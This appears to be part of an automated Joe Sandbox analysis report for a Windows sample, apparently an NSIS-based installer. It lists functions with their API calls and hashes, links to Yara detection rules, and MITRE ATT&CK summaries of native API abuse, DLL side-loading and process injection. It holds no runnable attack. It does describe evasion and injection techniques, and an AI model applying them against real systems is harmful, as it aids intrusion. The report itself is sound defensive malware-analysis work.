Instruction ID: 7e4692ed1c3e967feaf617caf8b683db29fbfa99fde863b1c96f6eb31ad0523a
Opcode Fuzzy Hash: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
Instruction Fuzzy Hash: C8114C71A00109FFDF21AF90DE49DAB3B7DEB54349B104136FA05B10A0DBB49E51AF69

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 3fa910a29a7471df273f3d5a519cdd9490650a943fe2164337c26205f225f611
Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
Opcode Fuzzy Hash: 3fa910a29a7471df273f3d5a519cdd9490650a943fe2164337c26205f225f611
Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79

Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 3e946d73b4ddc9b375eb78bf312b86fbeaf2fbdf02b63083e1009b0eaaac9267
Instruction ID: e98614b17e7a5d10a155c4b6304f3e92ae7defc274e3a3420abb617ebef8a141
Opcode Fuzzy Hash: 3e946d73b4ddc9b375eb78bf312b86fbeaf2fbdf02b63083e1009b0eaaac9267
Instruction Fuzzy Hash: E3018671958340AFEB015BB4AE0ABAA3FB4E715705F208439F142B72E2C57854159B2F

Function 00404667 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041FCD8,0041FCD8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
wsprintfA.USER32 ref: 0040470D
SetDlgItemTextA.USER32(?,0041FCD8), ref: 00404720

Strings

%u.%u%s%s, xrefs: 004046EF

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: fabf217e280f95901e27d13a5b377b8772edee093bc2c09b204756cbdb802f42
Instruction ID: bb6c02d87b5a590dcf5e60bd08fb8011c89fc701b4454ccbd5a96a7ae09536e5
Opcode Fuzzy Hash: fabf217e280f95901e27d13a5b377b8772edee093bc2c09b204756cbdb802f42
Instruction Fuzzy Hash: 6F11E773A041283BDB00666D9C41EAF3298DB82374F250637FA26F71D1F9799C1296E9

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728

Function 0040231C Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(00409BB0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.ADVAPI32(?,?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.ADVAPI32(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 30e95fe6958c5ecd2dd88e436728e964ee313c43297dab67f14f7c8466dc7e6b
Instruction ID: 3a938b5a8607202095c76e83426e5805640bb3b53fc5f2f09a26eea3e9d8e973
Opcode Fuzzy Hash: 30e95fe6958c5ecd2dd88e436728e964ee313c43297dab67f14f7c8466dc7e6b
Instruction Fuzzy Hash: 7711A2B1E00118BFEB10AFA4DE49EAF7678FB50358F10413AF905B61D1D7B86D01AA69

Function 004015B3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 004056E6: CharNextA.USER32(?,?,004210E0,?,00405752,004210E0,004210E0,0042A400,?,75573410,0040549D,?,0042A400,75573410,00000000), ref: 004056F4
Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 004056F9
Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 0040570D

CreateDirectoryA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 004015DB
GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
GetFileAttributesA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 004015F3
SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,?), ref: 00401622

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 341913b46653dc02a6b8c0ff5df98e195c602d220a8259587814e8818c9eeb9b
Instruction ID: d075d57f09c15f05164e6e7227da82a4385631acf0310a11cf010d3362af65ee
Opcode Fuzzy Hash: 341913b46653dc02a6b8c0ff5df98e195c602d220a8259587814e8818c9eeb9b
Instruction Fuzzy Hash: 5F112531908150AFDB112F755D44E6F37B0EA62366768473BF891B22E2D23C0D42D62E

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
Instruction ID: 9b91fbd94c6ee64b88793a3c9b4d2d612c2f555b57ffdd8fee231bc1bbe1e40f
Opcode Fuzzy Hash: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
Instruction Fuzzy Hash: 37115E71A00108BEDB01EFA5D981DAEBBB9EF04344B20807AF505F21A2D7389E54DB28

Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402DA5,?), ref: 00402BD8
GetTickCount.KERNEL32 ref: 00402BF6
CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
ShowWindow.USER32(00000000,00000005), ref: 00402C21

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
Instruction ID: 413067c0dd52ceff9b3bae724ffe8751623181a8cae7bdb8b5040e0cc41620bd
Opcode Fuzzy Hash: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
Instruction Fuzzy Hash: 43F05E7094A220ABC6216F20BE8CD9F7BBCF704B52B124876F104B12E4D678D8C1DB9C

Function 00404E1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404E49
CallWindowProcA.USER32(?,?,?,?), ref: 00404E9A

Part of subcall function 00403EBF: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403ED1

Strings

, xrefs: 00404E2A

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
Instruction ID: b130d42bb84d5447e475eed3bbf3cd484b2354f0b63da773ba138cf1eceff29e
Opcode Fuzzy Hash: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
Instruction Fuzzy Hash: CB015EB1500208ABDF219F61DC80AAB3A2AF7C5760F60413BFE04762D1D73A9D51E6E9

Function 0040587D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405891
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004058AB

Strings

nsa, xrefs: 00405888

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
Instruction ID: 97602d992a1fc3ea541738fe691a17a98ed12bbd3b61733a4c4fd0f0c3479bd5
Opcode Fuzzy Hash: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
Instruction Fuzzy Hash: B0F05E367482086AEB109A55DC44B9B7B98DB91750F14C02AFD44AA190D6B099548B99

Function 0040536C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
CloseHandle.KERNEL32(?), ref: 004053A2

Strings

Error launching installer, xrefs: 0040537F

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
Instruction ID: 6a75270a898cf8bf2a78dd2ca891eea3d0b09d4229ae2a6fcbb9112043bcd623
Opcode Fuzzy Hash: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
Instruction Fuzzy Hash: 5EE0BFB4A04209BFFB10EBA4ED45F7B7AADEB10788F408521BD14F2160D778A8108A79

Function 004065CC Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
Instruction ID: 17d8f0c9adc7b2b71efc7957c866aa3859f64222e8b37881b9213324db3bf9cd
Opcode Fuzzy Hash: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
Instruction Fuzzy Hash: E0A15171E00228CBDF28CFA8C8447ADBBB1FB44305F15806ED856BB281D7789A96DF44

Function 004067CD Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
Instruction ID: fc305786e35d93851c8f3c5d9b38f8a429e7909e60618e2c0103eac0a9dc1c25
Opcode Fuzzy Hash: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
Instruction Fuzzy Hash: C1913071E00228CBDF28CF98C8547ADBBB1FB44305F15816AD856BB281D7789A96DF44

Function 004064E3 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
Instruction ID: 045822fc5ab24079ba69da477224c4b1a41a130b0053ffb1807465ee2ef03bcb
Opcode Fuzzy Hash: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
Instruction Fuzzy Hash: AB814771E00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44

Function 00405FE8 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
Instruction ID: efdf2bc729d78145ecf5a565514c9258b5bbce2e4cf5113e346d1a35f2b936d2
Opcode Fuzzy Hash: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
Instruction Fuzzy Hash: AB817771E00228CBDF24DFA8C8447AEBBB0FB45305F15816AD856BB281D7785A96DF44

Function 00406436 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
Instruction ID: c983b8745f75bf2274a463a9cfcccf5039b1f1987fed19ece7001b5e7d797120
Opcode Fuzzy Hash: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
Instruction Fuzzy Hash: 3F712371E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF54

Function 00406554 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
Instruction ID: 3e902398f65232741f3d3f2c7f6467c21586f7f50b1ebc0ee674bbd924b4c7fc
Opcode Fuzzy Hash: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
Instruction Fuzzy Hash: FA714671E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44

Function 004064A0 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a381668fc57e9f6ced01437e848a6b2accfb19374870d44d6b2c2291bed7b2e
Instruction ID: 9020e7499a55ede5867a2e11e25a0f248b5ba7faeda0d39cd9abe089b181c94d
Opcode Fuzzy Hash: 9a381668fc57e9f6ced01437e848a6b2accfb19374870d44d6b2c2291bed7b2e
Instruction Fuzzy Hash: C5715671E00229CFEF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44

Function 004057B3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
lstrcmpiA.KERNEL32(004059E2,00000000), ref: 004057DB
CharNextA.USER32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057EC
lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction ID: ad6d9dedd63ee89ffd4e190405b35f06ce6ae84d6c36acf6f04f4a95cd08f7cb
Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction Fuzzy Hash: 66F0C232604558FFCB12DBA4DD4099EBBA8EF06350B2140B9F800F7210D274EE01ABA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

